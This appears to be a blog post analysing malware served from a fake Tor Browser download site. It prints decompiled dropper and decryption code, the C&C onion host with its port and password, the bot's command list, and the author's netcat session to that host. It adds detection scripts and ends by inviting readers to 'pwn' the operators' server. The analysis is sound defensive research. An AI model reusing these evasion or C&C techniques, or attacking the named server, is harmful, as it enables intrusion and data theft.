Title: Torbundlebrowser.org
Date: 2014-08-13 02:30

A couple of hours ago, a [friend of mine]( http://florent.daigniere.com/ ) told me:

> < nextgens> jvoisin> if you want some malware to look into: torbundlebrowser.org

The website is an almost perfect copy of the [original website](https://torproject.org),
except for the download link and the donation link, the latter pointing to a [bitcoin address](https://blockchain.info/address/12m7ahUqVaucu6ciJyLmVfTLzKGvC13SMa) instead of the Tor Project's donation page.

## Fake one
![fake]( {static}/images/tor_fake.png )


## Original one
![original]( {static}/images/tor_real.png )

# First binary

I downloaded the [alleged Tor Browser Bundle]( {static}/files/b7e516a33956cc60703cd0057d8d8874.zip) (password: infected), named 
"torbrowser-install-3.6.3_en-US.exe", and PEiD/[yara]( http://radare.today/yara-support/ )
told me that it's a .NET executable.  [ILSpy]( http://ilspy.net/ ) shows us:

```csharp
// Entry point: eval_b.a
// Architecture: x86
// Runtime: .NET 2.0

using System;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
[assembly: AssemblyVersion("3.6.3.0")]
[assembly: Dotfuscator("retail:1:1:4.9.5000.15987", 1, true)]
[assembly: AssemblyCompany("Tor Project")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCopyright("Copyright ©  2014")]
[assembly: AssemblyDescription("Tor Browser")]
[assembly: AssemblyFileVersion("3.6.3.0")]
[assembly: AssemblyProduct("Tor Browser 3.6.3")]
[assembly: AssemblyTitle("Tor Browser Obfuscated with Dotfuscator Professional Evaluation. Illegal to use on software for general release.")]
[assembly: AssemblyTrademark("")]
[assembly: CompilationRelaxations(8)]
[assembly: RuntimeCompatibility(WrapNonExceptionThrows = true)]
[assembly: ComVisible(false)]
[assembly: Guid("00000000-0000-0000-0000-000000000000")]
```

Just drop the binary on the latest version of [de4dot]( https://github.com/0xd4d/de4dot ) to get an unpacked version.

There is an interesting resource named "TorProject.vid.mkv", which seems to be some data with high entropy:
likely a packed/crypted payload.

The sample has a few methods; here is the (only) interesting one:

```csharp
// eval_a (decompiled; names are Dotfuscator-mangled)
using System;
using System.IO;
using System.Security.Cryptography;
using System.Text;

public static void eval_a(string string_0, string string_1, string string_2) {
    try {
        // RijndaelManaged defaults: 128-bit block, CBC mode, PKCS7 padding
        using (RijndaelManaged rijndaelManaged = new RijndaelManaged()) {
            // the same passphrase bytes serve as key *and* IV
            byte[] bytes = Encoding.UTF8.GetBytes(string_2);
            byte[] bytes2 = Encoding.UTF8.GetBytes(string_2);
            // string_0: encrypted input, string_1: decrypted output
            using (FileStream fileStream = new FileStream(string_0, FileMode.Open)) {
                using (FileStream fileStream2 = new FileStream(string_1, FileMode.Create)) {
                    using (ICryptoTransform cryptoTransform = rijndaelManaged.CreateDecryptor(bytes, bytes2)) {
                        using (CryptoStream cryptoStream = new CryptoStream(fileStream, cryptoTransform, CryptoStreamMode.Read)) {
                            int num;
                            // byte-by-byte copy; CryptoStream strips the padding at EOF
                            while ((num = cryptoStream.ReadByte()) != -1)
                                fileStream2.WriteByte((byte)num);
                        }
                    }
                }
            }
        }
    }
    catch (Exception) {} // any failure (bad key, missing file) is silently swallowed
}
```
It's called with the following parameters:

1. vid.mkv
2. Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\Windows\\" + "\\windll32.exe"
3. VisualStudio2010

So, to sum up: the next payload is encrypted with Rijndael (the .NET defaults, i.e. CBC mode with PKCS7 padding),
must be decrypted with the key "VisualStudio2010" (the same bytes are used as the IV),
and the result is written to *%AppData%\Windows\windll32.exe*.

Since I'm super lazy, I used a
[build of ILSpy]( http://community.sharpdevelop.net/blogs/marcueusebiu/archive/2011/04/12/ilspy-debugger-preview.aspx )
with an integrated debugger, set a breakpoint after the decryption,
and got the second binary.

# Second binary
I was quite amused by some of the method names, since the binary may look like a game at first sight:

```csharp
public static void CastNetToWinGame(string filename) // Take a screenshot
public static string MakeSenseofItAll(string Message, string Passphrase) // Decryption routine
public static string TallyUpScoresNewGame() // Network-interface-related crap
public static string NiceShot() // Check the serial number of Win32_PhysicalMedia
public static string HighScores(string Message, string Passphrase) // Decryption routine
public static string E3nCodeIt(string filename) // Base64 encoding of files
public static void StartANewGame(string ProcessFilename, string args) // Start a new process
public static void ClearScores(string filename) // Delete a file
public static bool VirtualReality() // Check whether the malware runs in a virtual machine (VMware/VirtualBox/VirtualPC)
public static void RegisterYourGame(string path) // Add a registry key for autostart/persistence
public static void MakeitNew(string upgfile) // Download, update/replace and run a new binary
public static string Levelup() // Get information about the hard drive
public void StartGame() // Set up the communication channel to the C&C
public void RoundTwo() // Communication protocol with the C&C
private void RecurringScores(string dirPath, string uploadPath) // Upload files recursively
private void ShotThroughTheHeart() // Try to take and upload a screenshot
private void FinalBossinGame(string filename) // Execute a custom command
private static void RollCredits() // Deploy the embedded Tor binary
...
```

Some commands are run through "cmd.exe" and are prefixed with `ping localhost -n 10 &`, a crude delay of roughly ten seconds,
likely to ensure that those commands are not run inside a sandbox like [cuckoo](http://cuckoosandbox.org/) before its analysis timeout expires.
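The ping-prefix trick leaves a tell in process-creation telemetry (Sysmon event 1, EDR command lines): a loopback ping with an echo count chained to a second command. The detector below is an added example, not from the write-up; the regular expression, the `approx_delay_s` estimate (Windows ping waits about one second between echoes, so `-n 10` is roughly nine seconds) and the sample command lines are my own, and the sample lines are constructed rather than captured from this malware.

```python
import re

# Loopback ping with an echo count, optionally redirected to nul, followed by "&" or "&&"
# and the command that was really meant to run.
DELAY_RE = re.compile(
    r"ping\s+(?:-n\s+(?P<n1>\d+)\s+)?(?P<host>localhost|127\.0\.0\.1)"
    r"(?:\s+-n\s+(?P<n2>\d+))?(?:\s*>\s*nul)?\s*&&?\s*(?P<cmd>\S.*)$",
    re.IGNORECASE,
)


def parse_delay_prefix(cmdline: str):
    """Return {'count', 'approx_delay_s', 'command'} when cmdline is a loopback-ping delay
    chained to another command, else None."""
    m = DELAY_RE.search(cmdline)
    if not m:
        return None
    count = int(m.group("n1") or m.group("n2") or 4)   # Windows ping defaults to 4 echoes
    return {
        "count": count,
        "approx_delay_s": max(count - 1, 0),            # ~1 s between echoes, first is instant
        "command": m.group("cmd").strip(),
    }


def scan_command_lines(lines, min_delay_s: int = 3):
    """Findings for every line whose ping prefix hides at least min_delay_s seconds;
    very short pings are common in legitimate batch files and are left alone."""
    findings = []
    for line in lines:
        hit = parse_delay_prefix(line)
        if hit and hit["approx_delay_s"] >= min_delay_s:
            hit["cmdline"] = line
            findings.append(hit)
    return findings


# Constructed process command lines (not captured from the sample); the first mirrors the
# pattern described in the write-up, the others are there to exercise the edge cases.
SAMPLE_COMMAND_LINES = [
    r'cmd.exe /c ping localhost -n 10 & C:\Users\bob\AppData\Roaming\Windows\windll32.exe',
    r'cmd.exe /c ping -n 5 127.0.0.1 > nul & C:\Users\bob\AppData\Local\Temp\update.exe',
    r'ping www.example.com -n 4',                       # ordinary diagnostic, nothing chained
    r'cmd.exe /c ping localhost -n 2 & echo done',      # chained, but too short to matter
]

if __name__ == "__main__":
    for f in scan_command_lines(SAMPLE_COMMAND_LINES):
        print("~%ds delay before: %s" % (f["approx_delay_s"], f["command"]))
```

The `command` field is the useful part of a finding: it is what the author (or the malware) actually wanted to run after the sandbox gave up, so it is what to pivot on next.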

## Decryption

All around the code, there are calls to these decryption functions with a base64-encoded string as first argument
and "video game hall of fame" as second. Here is the corresponding decryption function:

```csharp
using System;
using System.Security.Cryptography;
using System.Text;

public static string MakeSenseofItAll(string Message, string Passphrase) {
    UTF8Encoding uTF8Encoding = new UTF8Encoding();
    MD5CryptoServiceProvider mD5CryptoServiceProvider = new MD5CryptoServiceProvider();
    // key = MD5(passphrase): 16 bytes, i.e. two-key 3DES (K1, K2, K1)
    byte[] key = mD5CryptoServiceProvider.ComputeHash(uTF8Encoding.GetBytes(Passphrase));
    TripleDESCryptoServiceProvider tripleDESCryptoServiceProvider = new TripleDESCryptoServiceProvider();
    tripleDESCryptoServiceProvider.Key = key;
    tripleDESCryptoServiceProvider.Mode = CipherMode.ECB;        // no IV needed
    tripleDESCryptoServiceProvider.Padding = PaddingMode.PKCS7;
    byte[] array = Convert.FromBase64String(Message);
    byte[] bytes;
    try {
        ICryptoTransform cryptoTransform = tripleDESCryptoServiceProvider.CreateDecryptor();
        bytes = cryptoTransform.TransformFinalBlock(array, 0, array.Length);
    }
    finally {
        tripleDESCryptoServiceProvider.Clear();
        mD5CryptoServiceProvider.Clear();
    }
    return uTF8Encoding.GetString(bytes);
}
```

I wrote a quick'n'dirty decryptor in Python:

```python
# Python 3 / pycryptodome version of the original Python 2 script; the original
# also left the PKCS7 padding bytes on the decrypted strings.
import hashlib
from base64 import b64decode

from Crypto.Cipher import DES3
from Crypto.Util.Padding import unpad

# Same key derivation as MakeSenseofItAll: 3DES key = MD5(passphrase), ECB mode, PKCS7 padding
key = hashlib.md5(b"video game hall of fame").digest()
cipher = DES3.new(key, DES3.MODE_ECB)

ciphertexts = [
    "M8aFUlePIs6oxgq7J5o/cw==",
    "/uc+pciIRHwPlS13nLgrHxfjFjzK5eq7",
    "dsk6h/rjpLX3iTcm90vaMQ==",
    "/vAilHtgVYHl7LzMwlpm2Q==",
    "A3K7Xxqob+deeXuXJoIDUyX22ZlF0Y31",
    "oJTGIrUW7JfeVS7umpFv9Q==",
    "EgMhlrqaGkH3iTcm90vaMQ==",
    "dsk6h/rjpLX3iTcm90vaMQ==",
    "M635gItlrs+0hltKwH36eippmvgBHvW1",
    "QGANRB/9/IgDryaf2vg9qNlyF5mmOEktCmA1YfyPjoU=",
]

for i in ciphertexts:
    plain = unpad(cipher.decrypt(b64decode(i)), DES3.block_size)
    print("%s : %s" % (i, plain.decode("utf-8", "replace")))
```

This is the result:
```
M8aFUlePIs6oxgq7J5o/cw== : 127.0.0.1
/uc+pciIRHwPlS13nLgrHxfjFjzK5eq7 : silkroad6cebts64.onion
dsk6h/rjpLX3iTcm90vaMQ== : MESSAGE|
/vAilHtgVYHl7LzMwlpm2Q== :  downloaded OK
A3K7Xxqob+deeXuXJoIDUyX22ZlF0Y31 : Error downloading file
EgMhlrqaGkH3iTcm90vaMQ== : CONNECT|
dsk6h/rjpLX3iTcm90vaMQ== : MESSAGE|
M635gItlrs+0hltKwH36eippmvgBHvW1 :  Screenshot Captured:
oJTGIrUW7JfeVS7umpFv9Q== : \videodrv.exe
QGANRB/9/IgDryaf2vg9qNlyF5mmOEktCmA1YfyPjoU= :  Error getting screenshot
```

## Communication with the CC
The communication protocol is quite simple; the only interesting thing is that it runs over Tor,
on the hidden service silkroad6cebts64.onion:24576.

This is the message sent to connect to the CC and wait for commands:

```
CONNECT|v1.17117|117|
```

Where `v1.17` is the version number, and `117|` is likely a release type identifier, since I found
a "slim113" string in another sample.

Commands can be:

- `Netcat`, to launch another connection
- `putfile`, to download a file
- `upgrade`, to upgrade the malware
- `shot`, to get a screenshot
- `updir`, to upload a directory recursively
- `syscommand`, to execute a system command
- `GetDrives`, to get drives (duh.)
- `reboot`, to reboot (duh again)
- `restart`, to restart the malware
- `get`, to download a file
- `getfile`, to upload a file
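Because the protocol is plain pipe-delimited text once it leaves the Tor circuit, it is easy to recognise in a sandbox capture or on a Tor exit-side honeypot. The code below is an added example, not the author's or the malware's: it parses the bot-side `CONNECT|` and `MESSAGE|` lines and matches server-side verbs against the command list above. The `CONNECT` line is the one quoted in the write-up; that `MESSAGE|` is followed directly by the status strings decrypted earlier, that a server command's verb is its first `|`-separated token, and the whole sample session are assumptions, and the session is constructed, not captured.

```python
CC_HOST = "silkroad6cebts64.onion"            # from the decrypted strings
CC_PORTS = {24576: "control", 24577: "file transfer"}

# Server-side commands listed in the write-up; anything else deserves a closer look.
KNOWN_COMMANDS = {
    "Netcat", "putfile", "upgrade", "shot", "updir", "syscommand",
    "GetDrives", "reboot", "restart", "get", "getfile",
}


def parse_bot_message(payload: bytes):
    """Bot -> server line. 'CONNECT|v1.17117|117|' (the write-up reads the first field as
    version 'v1.17' plus a release tag '117') or 'MESSAGE|<status text>'."""
    try:
        text = payload.decode("utf-8")
    except UnicodeDecodeError:
        return None
    if "|" not in text:
        return None
    kind, rest = text.split("|", 1)
    if kind == "CONNECT":
        fields = [f for f in rest.split("|") if f]     # e.g. ['v1.17117', '117']
        return {"kind": "CONNECT", "fields": fields}
    if kind == "MESSAGE":
        return {"kind": "MESSAGE", "text": rest.strip()}
    return None


def classify_server_command(payload: bytes):
    """Server -> bot line: the verb is assumed to be the first '|'-separated token."""
    verb = payload.decode("utf-8", "replace").split("|", 1)[0].strip()
    return {"verb": verb, "known": verb in KNOWN_COMMANDS}


def summarise_session(port: int, flows):
    """flows: iterable of (direction, payload), direction 'c2s' (bot -> server) or 's2c'.
    Returns the beacons seen, the status messages and every command the server issued."""
    report = {"port_role": CC_PORTS.get(port, "unexpected"),
              "beacons": [], "messages": [], "commands": []}
    for direction, payload in flows:
        if direction == "c2s":
            msg = parse_bot_message(payload)
            if msg and msg["kind"] == "CONNECT":
                report["beacons"].append(msg["fields"])
            elif msg:
                report["messages"].append(msg["text"])
        else:
            report["commands"].append(classify_server_command(payload))
    return report


# Constructed session on the control port (only the CONNECT line is from the write-up).
SAMPLE_FLOWS = [
    ("c2s", b"CONNECT|v1.17117|117|"),
    ("s2c", b"GetDrives"),
    ("s2c", b"shot"),
    ("c2s", b"MESSAGE| Screenshot Captured:"),
    ("s2c", b"frobnicate|1"),                  # not in the documented command set
]

if __name__ == "__main__":
    r = summarise_session(24576, SAMPLE_FLOWS)
    print("port role:", r["port_role"], "beacons:", r["beacons"])
    for c in r["commands"]:
        print("server command %-12s %s" % (c["verb"], "known" if c["known"] else "UNKNOWN"))
```

An unknown verb in the summary is the thing to chase, since it means either a newer build of the bot than the one analysed here or a command the decompilation missed.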

There is also another port in use, `24577`, with "Snake Video Game" as password, likely used for file transfers.
I even had a chitchat with the botmaster:

```
amnesia@amnesia:~$ nc silkroad6cebts64.onion 24577
Snake Video Game
.
dir
.
Hello :)  
hi
Nice job with this malware
may i ask who this is
I stumbled upon your website, and was curious
oh nice. gj dissassembling. what did u use ?
ILSpy
I was curious about your payload
cool. great work. reflector could have worked too :D
Sure, but I prefer free sare you a malware researcher?
I didn't get your question
[REDACTED]
oh, 
payload needs work as u can tell
I'll be happy to take a look at it
Ho, by the way, I'm also curioushow did you find the site btw?
A friend of mine gave me the link          
heh nice, what are you using now, putty?
netcat
ah
Cdo you write mal?
You want me to send you an email?
sure [REDACTED]@safe-mail.net
I'm curious about how many bots do you have
[...]
```

S/he told me that they are a small group (maybe from China) trying to catch pedophiles
by spreading the link to the fake website on pedo-boards, adding that
one pedophile had already been reported to [cybertip](https://www.cybertip.ca/).
I'm not convinced, since the miscreant not only shipped malware instead of the real TBB,
but also replaced the donation page with his own BTC address.

Their server is a stack of outdated crap, proudly powered by [cPanel](https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=cPanel);
feel free to pwn them for more details.
